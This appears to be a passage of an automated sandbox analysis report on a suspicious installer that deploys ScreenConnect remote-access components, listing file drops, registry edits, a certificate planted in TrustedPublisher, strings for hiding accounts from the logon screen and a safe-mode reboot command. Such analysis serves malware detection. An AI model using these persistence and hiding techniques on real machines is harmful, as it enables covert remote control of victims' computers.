                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: khwHsyfsJ1.exeStatic PE information: certificate valid
                  Source: khwHsyfsJ1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: khwHsyfsJ1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: khwHsyfsJ1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: khwHsyfsJ1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: khwHsyfsJ1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: khwHsyfsJ1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: khwHsyfsJ1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EDAA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831129892.00000000012A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: khwHsyfsJ1.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EBFC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F0EE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1829272446.0000000005532000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1890524416.0000000002FA0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1890789904.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EDD7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F136000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1832507878.000000001BD62000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1825684879.0000000000FED000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EDD7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F136000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1832507878.000000001BD62000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EDAA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831129892.00000000012A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EBF8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F0EE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1829558136.00000000055E2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
                  Source: khwHsyfsJ1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: khwHsyfsJ1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: khwHsyfsJ1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: khwHsyfsJ1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: khwHsyfsJ1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeUnpacked PE file: 11.2.ScreenConnect.ClientService.exe.5530000.0.unpack
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.drStatic PE information: 0xBC0F508C [Tue Dec 24 14:17:48 2069 UTC]
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B61000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00B61000
                  Source: khwHsyfsJ1.exeStatic PE information: real checksum: 0x212e6 should be: 0x1eac7
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B61BC0 push ecx; ret 0_2_00B61BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887E2D2A5 pushad ; iretd 2_2_00007FF887E2D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F8A318 push eax; retf EB5Ah2_2_00007FF887F8AF2F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F47D00 push eax; retf 2_2_00007FF887F47D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F400BD pushad ; iretd 2_2_00007FF887F400C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F4842E pushad ; ret 2_2_00007FF887F4845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F4845E push eax; ret 2_2_00007FF887F4846D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F7E8A8 push E95B7198h; ret 2_2_00007FF887F7E8B9
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF88826DA5D push ebx; ret 13_2_00007FF88826DC9A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF88826126D push ebx; iretd 13_2_00007FF88826126E
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF88826DB5A push ebx; ret 13_2_00007FF88826DC9A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF888261381 push edx; iretd 13_2_00007FF888261382
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Core.dll
                  Source: ScreenConnect.ClientService.dll.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (41bb451f-21e9-4165-b8b1-29146c1a400a)

                  Hooking and other Techniques for Hiding and Protection

                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1832507878.000000001BD62000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.1829272446.0000000005532000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.1890524416.0000000002FA0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.1890789904.00000000031A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll0.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.Windows.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 1D43D130000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 1D456B70000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Memory allocated: 1000000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Memory allocated: 1ADB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Memory allocated: 2EA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Memory allocated: 30F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Memory allocated: 2F30000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Memory allocated: 14E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Memory allocated: 1770000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Memory allocated: 14E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Memory allocated: 1650000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Memory allocated: 1B1A0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599875
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599766
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599612
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599478
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599370
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599204
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599030
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598079
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597938
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597829
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597688
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597563
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597453
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597343
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597225
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597110
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596890
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596782
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596672
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596535
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596407
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596282
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596157
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596047
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595937
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595788
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595671
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595476Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595235Jump to behavior
